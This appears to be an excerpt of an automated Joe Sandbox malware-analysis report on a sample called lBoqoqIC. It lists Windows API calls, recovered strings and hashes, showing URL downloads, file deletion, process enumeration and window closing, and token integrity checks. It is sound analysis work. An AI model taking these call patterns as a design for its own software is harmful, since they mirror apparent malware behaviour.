                                                                                                                • Sleep.KERNEL32(000001F4,00523A30,00000000,?,00000000,00510864,?,00514880,?,/TUDEL,00510864,?,00000016,00000000,?,00000000), ref: 0047962E
                                                                                                                  • Part of subcall function 004C6286: lstrlen.KERNEL32(00000001,?,?,0040264F,?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00402920), ref: 004C6297
                                                                                                                  • Part of subcall function 0040AF5A: __EH_prolog.LIBCMT ref: 0040AF5F
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                • GetTempPathA.KERNEL32(00000104,?,update,_UseSystemCharacterSet,?,00000000,_ClientRestarted,?,00000001,00000000,?,/TURC,?,00000000,?,/TUDEL), ref: 00479868
                                                                                                                • Sleep.KERNEL32(000001F4,?,/TUCPS,?,00000000,00000000,?,/NOAUTOPROXY,?,00000001,?,/NOINIT,?,00000001,00523C9C,00510870), ref: 0047941B
                                                                                                                  • Part of subcall function 004C279E: __EH_prolog.LIBCMT ref: 004C27A3
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • Sleep.KERNEL32(000001F4,?,/TUDEL,?,00000000,?,/TUCPS,?,00000000,00000000,?,/NOAUTOPROXY,?,00000001,?,/NOINIT), ref: 00479714
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,00000000,?,00000000,?,?,00523C84,00510870,00514880,00000000,?,00000000,?,/TUCPS), ref: 004797AE
                                                                                                                • DeleteFileA.KERNEL32(?,?,00000000,?,/TUCPS,?,00000000,00000000,?,/NOAUTOPROXY,?,00000001,?,/NOINIT,?,00000001), ref: 004797B7
                                                                                                                • GetFileAttributesA.KERNEL32(?,00000000,?,?,00000000,?,00523C80,?,_ir_tu2_temp,?,?,/T:,?,00000000,00510870,?), ref: 00479A1B
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                • GetFileAttributesA.KERNEL32(?,00510870,00000000,?,?,?,/T:,?,00000000,00510870,?,00000000,0000005C), ref: 00479905
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,00000000,00510870,?,00000000,0000005C), ref: 00479924
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0040CA76: __EH_prolog.LIBCMT ref: 0040CA7B
                                                                                                                  • Part of subcall function 0040CA76: GetCurrentDirectoryA.KERNEL32(00000104,?,0000005C,0000005C,?,00000000,00510870), ref: 0040CACE
                                                                                                                  • Part of subcall function 0040CA76: SetCurrentDirectoryA.KERNEL32(?,?,00000000,00510870), ref: 0040CB2D
                                                                                                                  • Part of subcall function 0040CA76: CreateDirectoryA.KERNEL32(?,00000000,?,00000000,00510870), ref: 0040CB3F
                                                                                                                  • Part of subcall function 0040CA76: SetCurrentDirectoryA.KERNEL32(?,?,00000000,00510870), ref: 0040CBF3
                                                                                                                • GetDesktopWindow.USER32 ref: 00479CA4
                                                                                                                • UpdateWindow.USER32(?), ref: 00479D37
                                                                                                                • PostMessageA.USER32(?,00000401,00000000,00000000), ref: 00479D4A
                                                                                                                  • Part of subcall function 0046CC81: __EH_prolog.LIBCMT ref: 0046CC86
                                                                                                                  • Part of subcall function 004C9543: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,004C8BF3,?,004C8BF3,00000000,?,?,000000FF,000000FF,00000015), ref: 004C956A
                                                                                                                  • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileH_prolog$AttributesDirectoryWindow$CurrentInterlockedSleeplstrlen$AllocIncrement$CreateDecrementDeleteDesktopGlobalInitializeMessageModuleNamePathPostShowTempUpdateValue
                                                                                                                • String ID: $ data file (2).$ data file.$/NOAUTOPROXY$/NOFOCUS$/NOINIT$/T:$/TUCPS$/TUDEL$/TURC$ERROR: Failed to initialize unzip library.$Failed to create debug window.$Failed to create temporary folder: $Failed to extract resource files$Failed to find $Failed to load $Invalid application name.$_ClientRestarted$_SilentInstall$_UseSystemCharacterSet$_ir_tu2_temp$update
                                                                                                                • API String ID: 4225372811-3327941068
                                                                                                                • Opcode ID: a3e67d8edf0ba3c45cf105c75eb0547da319d14f3b1e9d854efc8646a282e173
                                                                                                                • Instruction ID: feba658612b1a881b226761b1606b2c9e9650df82c332d2741d926b4ffbe1704
                                                                                                                • Opcode Fuzzy Hash: a3e67d8edf0ba3c45cf105c75eb0547da319d14f3b1e9d854efc8646a282e173
                                                                                                                • Instruction Fuzzy Hash: 08829474900648EEDB44EBA5C985FEEBBB8AF15308F10415EF405A3282DB786F49DB35

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00435303
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00435334
                                                                                                                  • Part of subcall function 004146D6: __EH_prolog.LIBCMT ref: 004146DB
                                                                                                                  • Part of subcall function 004146D6: SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 00414702
                                                                                                                  • Part of subcall function 004146D6: SHGetPathFromIDList.SHELL32(?,?), ref: 00414716
                                                                                                                  • Part of subcall function 004146D6: SHGetMalloc.SHELL32(?), ref: 00414725
                                                                                                                  • Part of subcall function 004146D6: lstrlen.KERNEL32(?), ref: 0041474D
                                                                                                                  • Part of subcall function 004146D6: lstrlen.KERNEL32(?), ref: 00414760
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00020019,00000000,00000000,00000000,00000000,?,?,?,Common Documents,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,LocalMachine,00000000,00000000,00523A30), ref: 004357A6
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlockedlstrlen$DecrementFolderFromIncrementListLocationMallocPathSpecialVersion__ftol
                                                                                                                • String ID: AppData$Common AppData$Common Desktop$Common Documents$Common Programs$Common Start Menu$Common Startup$CommonFilesDir$CommonMusic$CommonPictures$CommonVideo$CurrentUser$Desktop$Fonts$Local AppData$LocalMachine$My Music$My Pictures$My Video$Personal$ProgramFilesDir$Programs$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Start Menu$Startup

                                                                                                                APIs
                                                                                                                • CoInitializeEx.COMBASE(00000000,00000000), ref: 10007C4A
                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 10007C73
                                                                                                                • CoCreateInstance.COMBASE(1001C290,00000000,00000001,1001C250,?), ref: 10007CB8
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10007CD5
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10007CF7
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10007D12
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10007D2A
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10007D78
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10007D85
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10007D92
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10007DA6
                                                                                                                • CoUninitialize.COMBASE ref: 10007E34
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10007E70
                                                                                                                • CoUninitialize.COMBASE ref: 10007E9D
                                                                                                                • CoUninitialize.COMBASE ref: 10007EF7
                                                                                                                • CoUninitialize.COMBASE ref: 10007F53
                                                                                                                  • Part of subcall function 100078F0: VariantClear.OLEAUT32(?), ref: 1000799B
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10007F8D
                                                                                                                • Sleep.KERNEL32(000000C8), ref: 10007F98
                                                                                                                • CoUninitialize.COMBASE ref: 10007FD5
                                                                                                                • CoUninitialize.COMBASE ref: 10008127
                                                                                                                  • Part of subcall function 100073F0: SysAllocString.OLEAUT32(1001C92C), ref: 10007450
                                                                                                                  • Part of subcall function 100073F0: SysFreeString.OLEAUT32 ref: 1000749D
                                                                                                                • SysAllocString.OLEAUT32(1001C948), ref: 10008070
                                                                                                                  • Part of subcall function 10007190: SysFreeString.OLEAUT32(-00000001), ref: 100071B0
                                                                                                                • SysFreeString.OLEAUT32 ref: 100080BF
                                                                                                                • CoUninitialize.COMBASE ref: 10008237
                                                                                                                • CoUninitialize.COMBASE ref: 1000844F
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10008470
                                                                                                                • CoUninitialize.COMBASE ref: 100084B8
                                                                                                                • _com_issue_error.COMSUPP ref: 100084F2
                                                                                                                • _com_issue_error.COMSUPP ref: 100084FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Uninitialize$String$ClearFreeInit$AllocInitialize_com_issue_error$CreateInstanceSecuritySleep
                                                                                                                • String ID: p=5w

                                                                                                                APIs
                                                                                                                • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 10004459
                                                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 1000447B
                                                                                                                • GetProcessHeap.KERNEL32(00000000,01000000,?,0337F980), ref: 10004495
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,0337F980), ref: 1000449C
                                                                                                                • InternetReadFile.WININET(?,00000000,01000000,00000000), ref: 100044B9
                                                                                                                • InternetCloseHandle.WININET(?,?,0337F980), ref: 100044D4
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,0337F980), ref: 100044EE
                                                                                                                • HeapFree.KERNEL32(00000000,?,0337F980), ref: 100044F5
                                                                                                                • Sleep.KERNEL32(00003A98,?,0337F980), ref: 1000457B
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?,?,0337F980), ref: 100045C5
                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,?,0337F980), ref: 100045CC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Internet$Process$FreeOpen$AllocateCloseFileHandleReadSleep
                                                                                                                • String ID: 6A2V$<?xm

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D4878: TlsGetValue.KERNEL32(005265C0,00000000,00000100,004D374A,004D317A,004C9C8D,00000100,004C9C26,?,?,00000100,00000000,?), ref: 004D48B7
                                                                                                                • CallNextHookEx.USER32(?,00000003,?,?), ref: 004C6CAF
                                                                                                                • GetClassLongA.USER32(?,000000E6), ref: 004C6CF6
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,?,004D317A), ref: 004C6D22
                                                                                                                • lstrcmpiA.KERNEL32(?,ime), ref: 004C6D31
                                                                                                                • GetWindowLongA.USER32(?,000000FC), ref: 004C6DA4
                                                                                                                • SetWindowLongA.USER32(?,000000FC,00000000), ref: 004C6DC5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
                                                                                                                • String ID: $aR$AfxOldWndProc423$ime

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                                                • GetParent.USER32(?), ref: 004C8A70
                                                                                                                • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004C8A93
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004C8AAC
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 004C8ABF
                                                                                                                • CopyRect.USER32(?,?), ref: 004C8B0C
                                                                                                                • CopyRect.USER32(?,?), ref: 004C8B16
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004C8B1F
                                                                                                                  • Part of subcall function 004A6DC1: MonitorFromWindow.USER32(00000002,00000000), ref: 004A6DD6
                                                                                                                  • Part of subcall function 004A6E2C: GetMonitorInfoA.USER32(00000002,00000000), ref: 004A6E43
                                                                                                                • CopyRect.USER32(?,?), ref: 004C8B3B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
                                                                                                                • String ID: ($@
                                                                                                                • API String ID: 1450647913-1311469180
                                                                                                                • Opcode ID: be16caf3e0b8b41ac0f52a4977b024a8499580312520c274f66ea4a71e35eeaa
                                                                                                                • Instruction ID: 3910e08b789bccc83bac65a78aa5eb1dd2426e5809b5da297576190abfef2f69
                                                                                                                • Opcode Fuzzy Hash: be16caf3e0b8b41ac0f52a4977b024a8499580312520c274f66ea4a71e35eeaa
                                                                                                                • Instruction Fuzzy Hash: 7C515176A00219ABCB50DBB8DC85FAEBBB9AF44314F15012EF501F7295DB34AD058B68

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 10006194
                                                                                                                • _strrchr.LIBCMT ref: 10006229
                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 10006307
                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 10006316
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 10006387
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 100063F0
                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 100063FD
                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 10006479
                                                                                                                • _strrchr.LIBCMT ref: 10006513
                                                                                                                  • Part of subcall function 1000E41C: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 1000E42F
                                                                                                                  • Part of subcall function 1000E41C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000E460
                                                                                                                • Sleep.KERNEL32(0002BF20,?,00000000), ref: 100065C5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Attributes$HeapTime_strrchr$FreeModuleNameProcessSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: at$d$ng$p
                                                                                                                • API String ID: 3749659953-777062955
                                                                                                                • Opcode ID: 0f8125bfd82b53fdd7aafdb3c97cdfbd3850ad1eb58e696d0f702bd24bf5aeda
                                                                                                                • Instruction ID: 573664d6437ee6934446c6ac3c60c780f0800bbe095913fce53b15821b61f99c
                                                                                                                • Opcode Fuzzy Hash: 0f8125bfd82b53fdd7aafdb3c97cdfbd3850ad1eb58e696d0f702bd24bf5aeda
                                                                                                                • Instruction Fuzzy Hash: 35C1B9B58002599AFB11DF60CD84FDAB7BDEF09380F1442E1E649E7146EA31EA85CF60

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 10004D80
                                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 10004D87
                                                                                                                • Wow64DisableWow64FsRedirection.KERNEL32(00000000), ref: 10004D97
                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 10004DB6
                                                                                                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 10004DC1
                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 10004DDE
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 10004DF9
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 10004E08
                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 10004E0F
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10004E24
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 10004E30
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 10004E37
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10004E3E
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10004E5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Wow64$FileHeapProcess$CloseCreateHandleRedirection$AllocateCurrentDisableFreeReadRevertSize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2878847362-0
                                                                                                                • Opcode ID: 167de3636b38ea6bba5dc563bf90ae400321c0886e2a39db6dc0a1f03e5977f8
                                                                                                                • Instruction ID: 77c1acfabcda30780286521e7688078ae814e83d371c97531112157a442e730d
                                                                                                                • Opcode Fuzzy Hash: 167de3636b38ea6bba5dc563bf90ae400321c0886e2a39db6dc0a1f03e5977f8
                                                                                                                • Instruction Fuzzy Hash: 3A315C71A00218FBF7129FA4DC88F9E7BACFB48755F118156FA01E6190DB70DA008B64

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?), ref: 1000670D
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 10006714
                                                                                                                • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 10006731
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 100068B6
                                                                                                                • ExitProcess.KERNEL32 ref: 100068C3
                                                                                                                • GetLastError.KERNEL32 ref: 100068C9
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100068D7
                                                                                                                • ExitProcess.KERNEL32 ref: 100068DF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ExitToken$CloseCreateCurrentErrorHandleInformationLastMutexOpen
                                                                                                                • String ID: 6A2V
                                                                                                                • API String ID: 4076312586-3928244006
                                                                                                                • Opcode ID: b8d26ceed53c047e46700abf3b324bc6c41cf1ba4b41ede2c5a790d9ee31a838
                                                                                                                • Instruction ID: 2b1cf3a252d780ef2a9d97db670ca594afcadeaaedd777b79188a83f88e3e9d7
                                                                                                                • Opcode Fuzzy Hash: b8d26ceed53c047e46700abf3b324bc6c41cf1ba4b41ede2c5a790d9ee31a838
                                                                                                                • Instruction Fuzzy Hash: 5D719BB4D0925CDBEB21CFA9D985A9DBBB4FF08350F20422DE905AB352DB309A45CF44

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004C9F80
                                                                                                                • GetSystemMetrics.USER32(0000002A), ref: 004CA031
                                                                                                                • GlobalLock.KERNEL32(?), ref: 004CA0BB
                                                                                                                • CreateDialogIndirectParamA.USER32(?,?,?,004C9D26,00000000), ref: 004CA0ED
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                                                                • String ID: Helv$MS Sans Serif$MS Shell Dlg
                                                                                                                • API String ID: 2364537584-2894235370
                                                                                                                • Opcode ID: 94003137178f02f13dcb0fbd09cbb30b01efeb0a306cce430947aba5841cb28f
                                                                                                                • Instruction ID: 8f8ca1ad54031ad0f3e120d7fe1f145f40c081d00986a5daf0d6078a2471081a
                                                                                                                • Opcode Fuzzy Hash: 94003137178f02f13dcb0fbd09cbb30b01efeb0a306cce430947aba5841cb28f
                                                                                                                • Instruction Fuzzy Hash: 07618B7490024AEFCF50EFA5C885EAEBBB1EF14348F14402FF505A2291CB388E55CB5A

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100052D4
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 100052FC
                                                                                                                • FindWindowExA.USER32(00000000,00000000,?,00000000), ref: 100054FD
                                                                                                                • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 1000550E
                                                                                                                • EnumWindows.USER32(10004CB0,?), ref: 1000551F
                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 1000552D
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000), ref: 1000553B
                                                                                                                • Sleep.KERNEL32(00001770,00000002,00000000), ref: 10005546
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateEnumFindFirstHandleMessageNextPostSleepSnapshotToolhelp32WindowWindows
                                                                                                                • String ID: 6A2V$e T3
                                                                                                                • API String ID: 2775078904-3670868295
                                                                                                                • Opcode ID: aa0dea92c5c97a6388449d677105f53942821ae44b199a6d30a1069d2dbab7ef
                                                                                                                • Instruction ID: 830b30aaeb561c28df364b661811c8f810fd65b94cb55e2501b621c2832f2fb3
                                                                                                                • Opcode Fuzzy Hash: aa0dea92c5c97a6388449d677105f53942821ae44b199a6d30a1069d2dbab7ef
                                                                                                                • Instruction Fuzzy Hash: 557139B4D022289FEB64DF59DC89B9EBBB4FF09340F1041D9E848A7291DB709A81CF45
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047EAA6
                                                                                                                  • Part of subcall function 0047EFC7: __EH_prolog.LIBCMT ref: 0047EFCC
                                                                                                                  • Part of subcall function 0047EF15: __EH_prolog.LIBCMT ref: 0047EF1A
                                                                                                                  • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                                                  • Part of subcall function 0047A66E: __EH_prolog.LIBCMT ref: 0047A673
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0040FB14: __EH_prolog.LIBCMT ref: 0040FB19
                                                                                                                  • Part of subcall function 0040FB14: GetFileAttributesA.KERNEL32(?,00523A30), ref: 0040FB45
                                                                                                                  • Part of subcall function 0040FB14: lstrcpy.KERNEL32(?,?), ref: 0040FB5E
                                                                                                                  • Part of subcall function 0040FB14: 752A1540.VERSION(00000000,00510870,?,?,?,?,00000000,00000000,?,?), ref: 0040FBA6
                                                                                                                  • Part of subcall function 004C61B3: lstrlen.KERNEL32(00000000,005108DC,?,?,004098A7,?,005108DC,00000000,?,00000000,00510870,00000000,?,?,?,00000002), ref: 004C61DF
                                                                                                                  • Part of subcall function 00478BA6: __EH_prolog.LIBCMT ref: 00478BAB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
